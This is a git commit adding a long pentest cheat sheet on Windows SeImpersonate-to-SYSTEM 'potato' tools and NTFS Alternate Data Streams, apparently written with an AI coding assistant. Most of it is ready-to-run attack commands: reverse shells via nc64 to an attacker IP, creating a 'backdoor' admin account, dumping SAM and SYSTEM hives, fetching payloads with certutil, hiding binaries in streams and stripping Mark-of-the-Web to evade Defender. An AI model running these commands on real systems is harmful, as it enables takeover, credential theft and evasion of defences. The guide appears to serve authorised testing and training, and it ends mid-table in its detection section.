commit 73b50b8fd73076caedc6df2e56d7482d0b4e9731
parent ad8eee4b87821386a6c6f2557c66bb40b1eb6942
Author: DAEMON <zer0sec.xp@icloud.com>
Date: Tue, 15 Sep 2026 03:40:07 +0100
feat: add Potato Attacks & Alternate Data Streams companion guide
New pentest-workflow companion guide for the SeImpersonate → SYSTEM potato
family: PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, and
SweetPotato. Each gets what it abuses, requirements, a full flag table, and
an "everything it can do" note, plus a which-potato-when decision table and
flow. Adds delivery recipes from MSSQL xp_cmdshell, IIS/ASPX web shells, and
WinRM, and a SYSTEM payload cookbook.
Second half covers NTFS Alternate Data Streams: stream syntax and types,
listing (dir /r, Get-Item -Stream, streams.exe), reading, staging binaries
into a stream, the modern stage → extract → run caveat, Mark-of-the-Web
(Zone.Identifier) read/strip, removal, and detection/OPSEC/cleanup.
Bundled binaries (PrintSpoofer64, GodPotato-NET4/NET35, JuicyPotato legacy,
SweetPotato, nc64) use the existing self-hosted download triplet; the three
not yet mirrored (JuicyPotatoNG, RoguePotato, EfsPotato) link to source.
Cross-links the Windows PrivEsc cheat sheet's "which potato?" note to the
new guide.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01LGt1BFBCTS16MDy6Vewoxe
Diffstat:
2 files changed, 555 insertions(+), 0 deletions(-)
diff --git a/src/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md b/src/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md
@@ -0,0 +1,553 @@
+---
+title: "Potato Attacks & Alternate Data Streams — Full Guide"
+description: "Windows SeImpersonate → SYSTEM with the whole potato family (PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, SweetPotato): what each abuses, every useful flag, delivery from MSSQL/IIS/WinRM, plus NTFS Alternate Data Streams for staging, hiding, and stripping Mark-of-the-Web."
+category: pentest-workflow
+subcategory: "Companion Guides"
+order: 25
+tags: ["htb", "cpts", "windows", "privilege-escalation", "token-impersonation", "seimpersonate", "potato", "printspoofer", "godpotato", "juicypotatong", "roguepotato", "efspotato", "sweetpotato", "ads", "alternate-data-streams", "ntfs", "mark-of-the-web", "pentest-workflow"]
+tools: ["PrintSpoofer", "GodPotato", "JuicyPotatoNG", "RoguePotato", "EfsPotato", "SweetPotato", "socat", "xp_cmdshell", "streams.exe"]
+difficulty: advanced
+updated: "2026-09-15"
+source: "vault:PrivEsc/PrivEsc - Windows.md (Token Manipulation & Potato Attacks) + NTFS ADS tradecraft"
+---
+
+[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc)
+
+# Potato Attacks & Alternate Data Streams — Full Guide `fas:ClipboardList`
+
+> [!dashboard] What this is
+> The long-form companion to the potato line in the [Windows Privilege Escalation cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts#2--token-privilege-abuse). The cheat sheet gives you the one-liner mid-box; this guide explains *what each potato actually abuses*, walks every useful flag, shows how to deliver them from an MSSQL shell / IIS web shell / WinRM, and then covers **NTFS Alternate Data Streams** — the trick you pair with the potatoes to stage the binary off a directory listing and strip Mark-of-the-Web before you run it.
+
+Almost every service account on Windows — `IIS APPPOOL\*`, `NT SERVICE\MSSQLSERVER`, `LOCAL SERVICE`, `NETWORK SERVICE`, and most third-party service accounts — holds **`SeImpersonatePrivilege`**. That one privilege is the whole game. If you land a shell as one of these accounts (a web shell, `xp_cmdshell`, a cracked service credential), a potato turns it into `NT AUTHORITY\SYSTEM` in a single command. The potatoes differ only in *how they trick SYSTEM into authenticating to something you control* so you can steal its token.
+
+## The gate check — do you even have a potato path? `fas:Terminal`
+
+Everything here lives or dies on one line. Run it first, every time:
+
+```batch
+whoami /priv
+```
+
+You are looking for either of these in the **Enabled** state:
+
+| Privilege | What it lets you do | Who usually has it |
+|---|---|---|
+| `SeImpersonatePrivilege` | Impersonate a client after it authenticates to you | IIS AppPool, MSSQL, `LOCAL SERVICE`, `NETWORK SERVICE`, most service accounts |
+| `SeAssignPrimaryTokenPrivilege` | Assign a primary token to a new process | Some service accounts, scheduled-task contexts |
+
+> [!warning]+ No privilege, no potato
+> `fas:TriangleExclamation`
+> If `whoami /priv` shows neither privilege (or shows them **Disabled** with no way to enable them), the potato family is a dead end — go back to the [Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) for services, registry, credential hunting, and kernel paths. A privilege that is present but *Disabled* is fine: potatoes enable it themselves at runtime through the token they steal.
+
+### How a potato works (the shared skeleton)
+
+Every tool below follows the same three beats. Only step 1 changes between them.
+
+```mermaid
+%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%%
+flowchart LR
+ A["1 · Coerce SYSTEM to authenticate\nto a listener you control\n(Spooler pipe / DCOM OXID / EFS RPC)"] --> B["2 · Catch the auth and negotiate\na SYSTEM security context\n(NTLM / SSPI)"]
+ B --> C["3 · Impersonate the SYSTEM token\n(needs SeImpersonate)"]
+ C --> D["4 · CreateProcessWithToken / AsUser\n→ your command runs as SYSTEM"]
+```
+
+The named difference — Print Spooler bug, DCOM/RPC OXID resolver, MS-EFSR — is just *the coercion trick in step 1*. When one is patched or disabled, you switch tools, not techniques.
+
+> [!success]+ Grab the binaries — checksum-verified, offline mirror
+> `fas:Toolbox`
+> Mirrored on this site (self-hosted, no third-party fetch). Verify the hash before you run anything you pulled off the internet on a client box:
+> - **PrintSpoofer:** [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc))
+> - **GodPotato (.NET 4.x):** [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc))
+> - **GodPotato (.NET 3.5):** [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc))
+> - **JuicyPotato (legacy):** [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc))
+> - **SweetPotato:** [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc))
+> - **nc64.exe** (reverse-shell stand-in): [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc))
+>
+> Not yet mirrored here — pull from source and rebuild/verify yourself: [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato).
+
+---
+
+## Which potato, when? `fas:Route`
+
+Confirm the build first — `[environment]::OSVersion.Version` (PowerShell) or `ver` (cmd) — then work down this list. The order is "most reliable / least noisy" first.
+
+| Tool | Coercion primitive | Needs | Works on | Reach for it when |
+|---|---|---|---|---|
+| **PrintSpoofer** | Print Spooler named pipe (`\pipe\spoolss`) | SeImpersonate **+ Spooler service running** | Win10 / Server 2016–2019 (and later where Spooler is up) | First choice — one binary, no network, interactive shell. |
+| **GodPotato** | DCOM/RPC OXID resolver (local) | SeImpersonate, matching .NET runtime | Server 2012–2022, Win8–11 | Spooler is disabled/absent (common on Server 2019+/Win11). Broadest coverage — try it first if unsure. |
+| **JuicyPotatoNG** | DCOM with a working CLSID + local SSPI on port 10247 | SeImpersonate | Win10 / Server 2016–2022 (pre-patch) | You want the classic JuicyPotato technique revived on a modern build; PrintSpoofer/GodPotato both failed. |
+| **RoguePotato** | Remote OXID resolver via a redirector on port 135 | SeImpersonate + outbound/redirected 135 | Server 2019 / Win10 1809+ | DCOM is usable but you need the fake OXID trick; you can stand up a `socat` redirector. |
+| **EfsPotato** | MS-EFSR (EFS RPC) local coercion | SeImpersonate or SeAssignPrimaryToken | Modern builds; multiple RPC interfaces to dodge patches | Great from `xp_cmdshell` / web shells; small, self-contained, swaps RPC pipes when one is patched. |
+| **SweetPotato** | Bundles several (EfsRpc, PrintSpoofer, RottenPotato, DCOM) | SeImpersonate | Modern builds | You want one binary with a fallback `-e` selector; good "if this fails, switch mode" tool. |
+
+```mermaid
+%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%%
+flowchart TD
+ P{"whoami /priv:\nSeImpersonate or\nSeAssignPrimaryToken?"} -->|No| STOP["Not a potato box —\nservices / registry / creds / kernel"]
+ P -->|Yes| SPOOL{"Print Spooler\nservice running?"}
+ SPOOL -->|Yes| PS["PrintSpoofer\n(interactive SYSTEM shell)"]
+ SPOOL -->|No| GP["GodPotato\n(pick NET4 / NET35 by runtime)"]
+ PS -->|fails| GP
+ GP -->|fails| SW["SweetPotato -e EfsRpc\nor EfsPotato (swap RPC pipe)"]
+ SW -->|fails| NG["JuicyPotatoNG\n(-s to seek a CLSID)"]
+ NG -->|DCOM blocked outbound| RG["RoguePotato\n(+ socat :135 redirector)"]
+```
+
+---
+
+## PrintSpoofer `fas:Terminal`
+
+**Abuses:** the Print Spooler service. PrintSpoofer coerces `spoolsv.exe` (running as SYSTEM) to connect back to a named pipe it controls, then impersonates the SYSTEM token off that pipe. No network egress, no DCOM — everything happens over local IPC.
+
+**Requirements:** `SeImpersonatePrivilege` **and** the Print Spooler service running (`sc query spooler` → `RUNNING`). On many Server 2019+/Win11 builds the Spooler is disabled by default post-PrintNightmare — that is your cue to switch to GodPotato.
+
+```batch
+:: Interactive SYSTEM shell in your current console — the go-to
+PrintSpoofer64.exe -i -c cmd
+
+:: Fire a single command as SYSTEM (non-interactive)
+PrintSpoofer64.exe -c "whoami"
+PrintSpoofer64.exe -c "net localgroup administrators lowpriv /add"
+
+:: Reverse shell back to your handler (catch with: nc -lnvp 8443)
+PrintSpoofer64.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
+
+:: Spawn on a specific logon session (e.g. pop a shell on an RDP user's desktop)
+PrintSpoofer64.exe -d 1 -c cmd
+```
+
+| Flag | Meaning |
+|---|---|
+| `-c <CMD>` | Command to run as SYSTEM (wrap in quotes; use `cmd /c ...` for shell built-ins) |
+| `-i` | Interact with the new process in the **current** console — this is what gives you a live SYSTEM shell |
+| `-d <SESSION_ID>` | Create the process in the given logon session / desktop (see `query session`) |
+| `-p <PROGRAM>` | Program to launch (default `C:\Windows\System32\cmd.exe`) |
+| `-h` | Help |
+
+> [!tip]+ Everything PrintSpoofer can do
+> `fas:Lightbulb`
+> Anything `cmd`/a program can do, now as SYSTEM: pop an interactive shell (`-i -c cmd`), run one command (`-c`), throw a reverse shell, add a local admin, launch a Meterpreter/Sliver stager, read `C:\Windows\System32\config\SAM`, or spawn on another user's desktop with `-d`. It does **not** need outbound network — ideal on segmented internal hosts where DCOM/135 is filtered.
+
+---
+
+## GodPotato `fas:Terminal`
+
+**Abuses:** DCOM. GodPotato stands up a local fake OXID resolver and drives a DCOM activation so a SYSTEM RPC context authenticates to it, then impersonates. It is the broadest-coverage modern potato — **Server 2012 through 2022, Windows 8 through 11** — and needs no Print Spooler.
+
+**Requirements:** `SeImpersonatePrivilege` and a matching .NET runtime. Pick the binary by what is installed: `GodPotato-NET4.exe` for .NET 4.x (the common case), `GodPotato-NET35.exe` when only .NET 2.0/3.5 is present. Check with `dir %WINDIR%\Microsoft.NET\Framework\`.
+
+```batch
+:: Prove it — run whoami as SYSTEM
+GodPotato-NET4.exe -cmd "cmd /c whoami"
+
+:: Add a local admin / new user
+GodPotato-NET4.exe -cmd "cmd /c net user backdoor P@ssw0rd123! /add"
+GodPotato-NET4.exe -cmd "cmd /c net localgroup administrators backdoor /add"
+
+:: Reverse shell (catch with nc -lnvp 8443)
+GodPotato-NET4.exe -cmd "cmd /c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
+
+:: .NET 3.5-only host
+GodPotato-NET35.exe -cmd "cmd /c whoami"
+```
+
+| Flag | Meaning |
+|---|---|
+| `-cmd <COMMAND>` | Command to execute as SYSTEM (prefix with `cmd /c` for built-ins like `whoami`, `net`, `type`) |
+| `-rpc_port <PORT>` | Pin the internal RPC listener port (default is chosen automatically; set it if a port collides) |
+| `-h` | Help |
+
+> [!tip]+ Everything GodPotato can do
+> `fas:Lightbulb`
+> Single-shot command execution as SYSTEM with the widest OS coverage of the family and **no Spooler and no external network** required. Use it to run a reverse shell, add an admin, dump hives, or kick off a C2 stager. Because it is fully local it is the reliable fallback whenever PrintSpoofer's Spooler dependency isn't met. It runs one command per invocation, so for a shell, have it launch `nc64.exe` or a stager rather than expecting an interactive prompt.
+
+---
+
+## JuicyPotatoNG `fas:Terminal`
+
+**Abuses:** DCOM, like the original JuicyPotato, but revived for modern Windows. It uses a CLSID that still resolves for service accounts and negotiates the SYSTEM context locally over SSPI on a fixed port (default **10247**), sidestepping the 2018 DCOM hardening that killed classic JuicyPotato.
+
+**Requirements:** `SeImpersonatePrivilege`. Works on Windows 10 / Server 2016–2022 depending on patch level. Not bundled here — build from [source](https://github.com/antonioCoco/JuicyPotatoNG).
+
+```batch
+:: Default run — uses a built-in working CLSID and port 10247, runs cmd
+JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
+
+:: Reverse shell
+JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
+
+:: Let it seek a usable CLSID for this exact build
+JuicyPotatoNG.exe -s -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
+
+:: Custom COM listen port if 10247 is taken
+JuicyPotatoNG.exe -t * -l 10999 -p cmd.exe -a "/c whoami"
+```
+
+| Flag | Meaning |
+|---|---|
+| `-t <a\|u\|*>` | Token-creation call: `u` = `CreateProcessWithTokenW` (needs SeImpersonate), `a` = `CreateProcessAsUser` (needs SeAssignPrimaryToken), `*` = try both |
+| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) |
+| `-a <ARGS>` | Arguments passed to the program (e.g. `"/c whoami"`) |
+| `-l <PORT>` | Local COM server listen port (default `10247`) |
+| `-c <CLSID>` | Use a specific CLSID instead of the built-in default |
+| `-s` | Seek — probe for a CLSID that works on this host |
+| `-b` | Bruteforce all CLSIDs (loud; last resort) |
+| `-i` | Interactive (run the program in the current console) |
+
+> [!info]+ JuicyPotatoNG vs. the legacy JuicyPotato
+> `fas:Lightbulb`
+> The bundled [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) is the **legacy** tool — dead on Server 2019 / Windows 10 1809 and later because of DCOM hardening; keep it only for Server 2016-and-older targets (`JuicyPotato.exe -l 53375 -p cmd.exe -a "/c whoami" -t *`, needs a CLSID matching the OS). **JuicyPotatoNG** is the modern rewrite that works past that hardening. If you're on anything current, use NG, not the legacy binary.
+
+---
+
+## RoguePotato `fas:Terminal`
+
+**Abuses:** DCOM with a *remote* OXID resolver. RoguePotato forces the DCOM OXID resolution to go out to TCP **135** on a host you control, which redirects it back to a local listener — letting you complete the SYSTEM NTLM negotiation on builds where the fully-local trick doesn't fire.
+
+**Requirements:** `SeImpersonatePrivilege`, and the ability to reach an attacker-controlled resolver on port 135 (you run a `socat` redirector). This is the one potato with a network dependency. Not bundled here — build from [source](https://github.com/antonioCoco/RoguePotato).
+
+```bash
+# On YOUR box: redirect victim's 135 back to its RoguePotato listener (default 9999)
+socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
+```
+
+```batch
+:: On the victim: -r = your redirector IP, -l = local OXID listener, -e = command
+RoguePotato.exe -r 10.10.14.3 -e "cmd.exe /c whoami > C:\Windows\Temp\r.txt" -l 9999
+
+:: Reverse shell variant
+RoguePotato.exe -r 10.10.14.3 -e "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -l 9999
+```
+
+| Flag | Meaning |
+|---|---|
+| `-r <IP>` | Remote OXID resolver IP — your box running the `socat` redirect on 135 |
+| `-e <COMMAND>` | Command to execute as SYSTEM |
+| `-l <PORT>` | Local fake OXID resolver listen port (default `9999`; must match the `socat` target) |
+| `-c <CLSID>` | Specific CLSID to activate |
+| `-p <PIPE>` | Named pipe to use (advanced) |
+| `-z` | Test mode — check whether the technique will work without executing |
+
+> [!warning]+ RoguePotato needs egress to port 135
+> `fas:TriangleExclamation`
+> If outbound/redirected 135 to your redirector is blocked (very common on segmented internal networks), RoguePotato can't complete. In that case fall back to a fully-local potato — GodPotato, EfsPotato, or SweetPotato's EfsRpc mode — which need no network at all.
+
+---
+
+## EfsPotato `fas:Terminal`
+
+**Abuses:** MS-EFSR, the Encrypting File System Remote Protocol (the same RPC family as PetitPotam). EfsPotato coerces SYSTEM to authenticate to a local pipe via an EFS RPC call, then impersonates. It exposes **several RPC interfaces**, so when Microsoft patches one you switch to another with a single argument.
+
+**Requirements:** `SeImpersonatePrivilege` **or** `SeAssignPrimaryTokenPrivilege`. It is tiny and self-contained, which makes it a favourite from `xp_cmdshell` and cramped web shells. Not bundled here — grab or compile from [source](https://github.com/zcgonvh/EfsPotato) (single `.cs`, buildable on-target with `csc.exe`).
+
+```batch
+:: Simplest form — run a command as SYSTEM
+EfsPotato.exe "whoami"
+EfsPotato.exe "net user backdoor P@ssw0rd123! /add"
+
+:: Pick a specific RPC pipe when the default is patched
+:: valid pipes: lsarpc | efsrpc | samr | lsass | netlogon
+EfsPotato.exe "whoami" lsarpc
+EfsPotato.exe "whoami" efsrpc
+
+:: Reverse shell
+EfsPotato.exe "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
+```
+
+```powershell
+# Compile on-target if you only have the .cs (no external toolchain needed)
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /nowarn:1691,618 EfsPotato.cs
+```
+
+| Argument | Meaning |
+|---|---|
+| `<command>` (1st positional) | Command to run as SYSTEM |
+| `<pipe>` (2nd positional, optional) | RPC interface to abuse: `lsarpc`, `efsrpc`, `samr`, `lsass`, `netlogon` — rotate through these if the default is blocked/patched |
+
+> [!tip]+ Everything EfsPotato can do
+> `fas:Lightbulb`
+> Fully local (no Spooler, no network), tiny, and compilable on-target — which is why it shines from MSSQL `xp_cmdshell` and low-footprint web shells. Its standout feature is the **swappable RPC pipe**: if `EfsPotato.exe "whoami"` fails because one interface is patched, retry with `lsarpc`, then `efsrpc`, then `samr`, etc. SweetPotato's `EfsRpc` mode is the same primitive wrapped in a bigger multi-tool.
+
+---
+
+## SweetPotato `fas:Terminal`
+
+**Abuses:** whatever you select. SweetPotato bundles several coercion primitives behind a `-e` switch — commonly `EfsRpc` (default), `PrintSpoofer`, and `DCOM` (older/other forks also carry `RottenPotato`) — so a single binary carries built-in fallbacks. When one mode fails, change `-e` instead of uploading a new tool. The exact set depends on the fork; run `SweetPotato.exe -h` to see what your build exposes.
+
+**Requirements:** `SeImpersonatePrivilege`. Modern builds. Bundled: [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)).
+
+```batch
+:: Default (EfsRpc mode) — run a command as SYSTEM
+SweetPotato.exe -a "/c whoami"
+
+:: Force a specific technique
+SweetPotato.exe -e EfsRpc -p C:\Windows\System32\cmd.exe -a "/c whoami"
+SweetPotato.exe -e PrintSpoofer -p C:\Windows\System32\cmd.exe -a "/c whoami"
+SweetPotato.exe -e DCOM -p C:\Windows\System32\cmd.exe -a "/c whoami"
+
+:: Reverse shell
+SweetPotato.exe -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
+```
+
+| Flag | Meaning |
+|---|---|
+| `-e <EXPLOIT>` | Technique: `EfsRpc` (default), `PrintSpoofer`, `DCOM` (fork-dependent; some carry `RottenPotato`) |
+| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) |
+| `-a <ARGS>` | Arguments (e.g. `"/c whoami"`) |
+| `-l <PORT>` | COM server listen port (for `DCOM`/`RottenPotato` modes) |
+| `-c <CLSID>` | CLSID for DCOM-based modes |
+
+> [!tip]+ Everything SweetPotato can do
+> `fas:Lightbulb`
+> It's the "one binary, several potatoes" option. Start with the default `EfsRpc`, and if it fails cycle `-e PrintSpoofer` (needs the Spooler) → `-e DCOM` → `-e RottenPotato`. Handy when you can only upload one file but don't know yet which primitive the target will accept.
+
+---
+
+## Delivery — getting a potato onto the box and running it `fas:RocketLaunch`
+
+You rarely get a clean interactive prompt. These are the common contexts where you already hold a `SeImpersonate` account and how to drive a potato from each. Transfer methods (SMB, HTTP, `certutil`, `iwr`) are in [Foothold — File Transfers](/sheets/pentest-workflow/foothold-file-transfers).
+
+### From MSSQL `xp_cmdshell`
+
+MSSQL service accounts almost always hold `SeImpersonate`. This is the classic MSSQL → SYSTEM chain.
+
+```sql
+-- 1) enable xp_cmdshell
+EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
+EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
+
+-- 2) confirm the privilege
+EXEC xp_cmdshell 'whoami /priv';
+
+-- 3) stage the potato (HTTP pull from your box)
+EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.3/GodPotato-NET4.exe C:\Windows\Temp\g.exe';
+
+-- 4) fire it as SYSTEM
+EXEC xp_cmdshell 'C:\Windows\Temp\g.exe -cmd "cmd /c net localgroup administrators sql_svc /add"';
+```
+
+### From an IIS / ASPX web shell
+
+IIS AppPool identities hold `SeImpersonate` by design. From a web shell (`whoami` → `iis apppool\...`):
+
+```powershell
+# Pull the tool, then run it — one command per web-shell request
+Invoke-WebRequest -Uri http://10.10.14.3/PrintSpoofer64.exe -OutFile C:\Windows\Temp\ps.exe
+C:\Windows\Temp\ps.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
+```
+
+`C:\Windows\Temp` and `C:\Windows\System32\spool\drivers\color` are usually writable by the AppPool identity — good staging spots. See [Web Shells](/sheets/pentest-workflow/web-shells) for the shell itself.
+
+### From WinRM / evil-winrm
+
+```bash
+# On your box
+evil-winrm -i 10.10.10.100 -u svc_web -p 'Password123!'
+```
+
+```powershell
+# Inside the session — upload is built into evil-winrm
+upload /opt/tools/GodPotato-NET4.exe C:\Windows\Temp\g.exe
+C:\Windows\Temp\g.exe -cmd "cmd /c whoami"
+```
+
+> [!tip]+ Interactive vs. one-shot potatoes
+> `fas:Lightbulb`
+> **PrintSpoofer** (`-i -c cmd`) and **JuicyPotatoNG** (`-i`) can hand you a *live* SYSTEM prompt. **GodPotato**, **EfsPotato**, **RoguePotato**, and **SweetPotato** run one command per invocation — so from those, have them launch `nc64.exe`/a C2 stager for your shell rather than expecting a prompt to appear.
+
+### SYSTEM payload cookbook
+
+What to actually run once a potato lands you SYSTEM. Track every artefact you create for cleanup.
+
+```batch
+:: Interactive shell (PrintSpoofer / JuicyPotatoNG)
+... -i -c cmd
+
+:: Reverse shell (any potato) — nc -lnvp 8443 on your box
+... "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd"
+
+:: Local admin (loud, logged — prefer a shell/token over a new account on real engagements)
+... "cmd /c net user backdoor P@ssw0rd123! /add & net localgroup administrators backdoor /add"
+
+:: Dump the SAM/SYSTEM hives for offline hash extraction
+... "cmd /c reg save HKLM\SAM C:\Windows\Temp\sam.sav /y & reg save HKLM\SYSTEM C:\Windows\Temp\sys.sav /y"
+
+:: Stage a Meterpreter/Sliver/C2 beacon as SYSTEM
+... "cmd /c C:\Windows\Temp\beacon.exe"
+```
+
+Then pull the hives and crack offline: `impacket-secretsdump -sam sam.sav -system sys.sav LOCAL`.
+
+---
+
+## NTFS Alternate Data Streams (ADS) `ris:FileList`
+
+ADS are the trick you pair with the potatoes: stage the binary in a stream so it doesn't show in a directory listing, and strip Mark-of-the-Web off anything you downloaded so SmartScreen/Defender don't flag it. They're a legitimate NTFS feature, quietly abused for hiding data since Windows NT.
+
+### What an ADS actually is
+
+On NTFS, every file has at least one data stream — the **default (unnamed) stream** that holds the content you normally see. NTFS lets you attach additional **named streams** to the same file. The main file keeps its name and its reported size; the extra streams ride along invisibly.
+
+**Syntax:** `filename:streamname:streamtype`
+
+Common stream types:
+
+| Type | Purpose |
+|---|---|
+| `$DATA` | Actual data content — by far the most common, and what you'll use |
+| `$INDEX_ALLOCATION` | Directory indexes (attaching this to a name creates a directory-like object) |
+| others | Assorted NTFS metadata streams |
+
+Why it matters to both sides of the keyboard:
+
+- **Invisible to normal listings.** Plain `dir` and Explorer don't show streams — you need `dir /r` or PowerShell's `-Stream`.
+- **They don't change the file's reported size.** The host file still shows its original size; the stream's bytes aren't counted.
+- **They travel with the file on NTFS**, and are **silently stripped** when the file crosses to FAT32/exFAT, most network shares, email, or an HTTP upload. Handy for evasion; a trap if you rely on a stream surviving a copy.
+- **No special permission needed.** If you can write the file, you can add a stream to it.
+
+### Reading a stream
+
+```batch
+:: cmd — the classic
+more < "C:\Windows\Temp\notes.txt:hidden:$DATA"
+```
+
+```powershell
+# PowerShell — cleanest
+Get-Content C:\Windows\Temp\notes.txt -Stream hidden
+
+# notepad opens a named stream directly
+notepad C:\Windows\Temp\notes.txt:hidden
+```
+
+### Finding streams (both sides)
+
+```batch
+:: cmd — /r reveals streams next to each file (look for the "file:stream:$DATA" lines)
+dir /r C:\Windows\Temp
+```
+
+```powershell
+# PowerShell — list every stream on a file, or hunt a whole tree
+Get-Item C:\Windows\Temp\notes.txt -Stream *
+Get-ChildItem C:\Users -Recurse | ForEach-Object { Get-Item $_.FullName -Stream * -ErrorAction SilentlyContinue } |
+ Where-Object Stream -ne ':$DATA'
+```
+
+```batch
+:: Sysinternals streams.exe — purpose-built, recursive
+streams.exe -s C:\Users
+```
+
+### Writing / staging into a stream
+
+```batch
+:: Hide text
+echo secret-loot-here > "C:\Windows\Temp\notes.txt:stash"
+
+:: Stash a binary inside an innocuous host file (NTFS→NTFS copy)
+type C:\Tools\GodPotato-NET4.exe > "C:\Windows\Temp\log.txt:g.exe"
+```
+
+```powershell
+# PowerShell staging
+Set-Content -Path C:\Windows\Temp\notes.txt -Stream stash -Value 'secret-loot-here'
+```
+
+> [!warning]+ Running an EXE straight from a stream is mostly dead on modern Windows
+> `fas:TriangleExclamation`
+> Older Windows let you launch a process whose image *was* an ADS. Current builds block that — `start file.txt:g.exe` / `Start-Process` against a stream fails. So use ADS for **staging and hiding**, then **copy the payload back out to a normal file to execute it**:
+> ```batch
+> type C:\Tools\GodPotato-NET4.exe > C:\Windows\Temp\log.txt:g.exe :: hide
+> more < C:\Windows\Temp\log.txt:g.exe > C:\Windows\Temp\g.exe :: extract to run
+> C:\Windows\Temp\g.exe -cmd "cmd /c whoami"
+> ```
+> Script and DLL loaders (`powershell`, `wscript`/`cscript`, `rundll32`, `regsvr32`) can still be *fed* from a stream via LOLBINs, but the reliable, portable pattern is stage-in-stream → extract → run.
+
+### Mark-of-the-Web — the ADS you meet every engagement
+
+Every file a browser or `Invoke-WebRequest` downloads gets a `Zone.Identifier` stream (Mark-of-the-Web). It's what makes SmartScreen and Defender treat a file as "from the internet." Reading it is a forensics staple; stripping it is an evasion staple.
+
+```powershell
+# See where a downloaded file came from (blue-team / OSINT gold — often has the source URL)
+Get-Content .\PrintSpoofer64.exe -Stream Zone.Identifier
+
+# Strip MOTW so SmartScreen/Defender stop nagging (two equivalent ways)
+Remove-Item .\PrintSpoofer64.exe -Stream Zone.Identifier
+Unblock-File .\PrintSpoofer64.exe
+```
+
+```batch
+:: The stealthiest way to drop MOTW is to never create it: pull the tool with a
+:: transport that doesn't write Zone.Identifier (SMB copy, certutil), not a browser.
+certutil -urlcache -f http://10.10.14.3/PrintSpoofer64.exe C:\Windows\Temp\ps.exe
+```
+
+### Removing a stream
+
+```powershell
+# Delete just one stream, keep the file
+Remove-Item C:\Windows\Temp\notes.txt -Stream stash
+```
+
+```batch
+:: cmd has no native single-stream delete — round-trip through a non-NTFS
+:: filesystem (copy off to FAT/exFAT and back) strips every stream at once.
+```
+
+> [!info]+ How the potatoes and ADS fit together
+> `fas:Lightbulb`
+> The workflow: land as a `SeImpersonate` service account → stage your potato + `nc64.exe` inside an ADS on a boring file in `C:\Windows\Temp` so a casual `dir` shows nothing → strip `Zone.Identifier` (or transfer with `certutil`/SMB so it's never written) → extract to a normal path → run the potato → SYSTEM. Then clean the streams **and** the extracted files at teardown.
+
+---
+
+## Detection, OPSEC & cleanup `fas:Shield`
+
+> [!danger] Authorised testing only
+> `fas:TriangleExclamation`
+> Potato attacks land you SYSTEM and ADS hide artefacts on a real host. Run these only against systems you're explicitly authorised to test. Track every binary, stream, user, and hive dump you create, with full paths, and remove them at cleanup.
+
+**What the blue team sees:**
+
+| Signal | Where |
+|---|---|
